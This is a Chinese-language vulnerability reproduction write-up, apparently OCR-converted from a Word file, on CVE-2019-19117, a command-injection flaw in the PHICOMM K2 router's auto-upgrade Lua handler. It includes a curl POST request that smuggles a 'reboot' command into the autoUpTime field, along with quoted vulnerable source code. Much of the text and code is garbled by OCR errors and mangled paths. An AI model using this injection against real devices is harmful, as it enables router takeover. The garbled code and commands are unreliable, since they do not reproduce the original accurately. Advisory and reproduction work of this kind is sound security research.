（CVE-2019-19117）PHICOMM 远程代码执行.docx

(CVE-2019-19117) PHICoMM 远程代码执行一、漏洞简介通过修改HTTPPOSt请求中的内容，在根Shen上远程执行命令。二、漏洞影响PHIC0MM K2(PSG1218) V22.5.9.163三、复现过程受影响的源代码文件：usrliblualuciCOntroIIei'adminautoupgrade.lua受影响的函数：SaVe ()漏洞详情首先，在通过Web登录身份验证，会话劫持漏洞或弱凭据破解攻击以获取访问权 限后，向设备发送精心制作的数据包curl -i -s -k -v -X'POST' -e ',http:/192.168.2.lcgi-binluci;stok=xx xxxxx×xxxx" -b "sysauth=4a2c4bdba5fbl273ce62759fd42dba42" -data-bin ary "mode=l&autoUpTime=02%3A051reboot" 'http:/192.168.2.1/cgi-bin/luci /;stok=xx×admin×x××xxxx×,在此http数据包中，我们将要执行“重新引导”的命令添加到数据包内容中。 Jj%qnq, i$("#WanCheCkmodaI"). modal("show");$(N#autoUpTimeM)val($("#uptImehourN)val() "：" $(M#uptimeminM).val();SetTimeout(fnction() document. save.submit ();, 1O);我们可以看到，将'autoUpTime，的值直接分配给变量，而无需检查该值是否被恶意 修改，然后发送给服务器。function sve()local time = luci.http.forRvalue(',autoUpTtRe") local node « Iuct.http.forRvalue('node") local upgrading = "1" if node = *l thenluct.sys.cll(uct set sytteR.autoupgrade.up.ttne>%s" % tine)Iuct.sys.call(Muct set systen.autoupgrade.uptype6(a)luct.sys.call(Nuct C0Rtt system,)SCheduletask.settaskatr(systen"r HautoupgradeM, wltb auto upgrade.sh" 9 "yesM, m 16" ,"up tine,)SCheduletask.cfgscdutskbyla(, add,* /system* /(autoupgrdde,) elsetf node = " thenluct.sys.call(Nuct set systen.utouprde.up-typel")luct.sys.call(,uct CoRntt syste,t)Scheduletask. cfgscdutskbylua( "del, /systen" /,utoupgrde") endluci.http.redtrect(Iuct.dispatcher.butldaurI CadntnM ,"nore_syssetM/'autoupradeM),(node=Rde, upgrading upgrading ) end然后，服务器直接将数据附加到命令，而无需检查数据是否也被恶意修改，从而使 攻击者想要执行的命令附加到该命令。最后，路由器将执行命令"reboot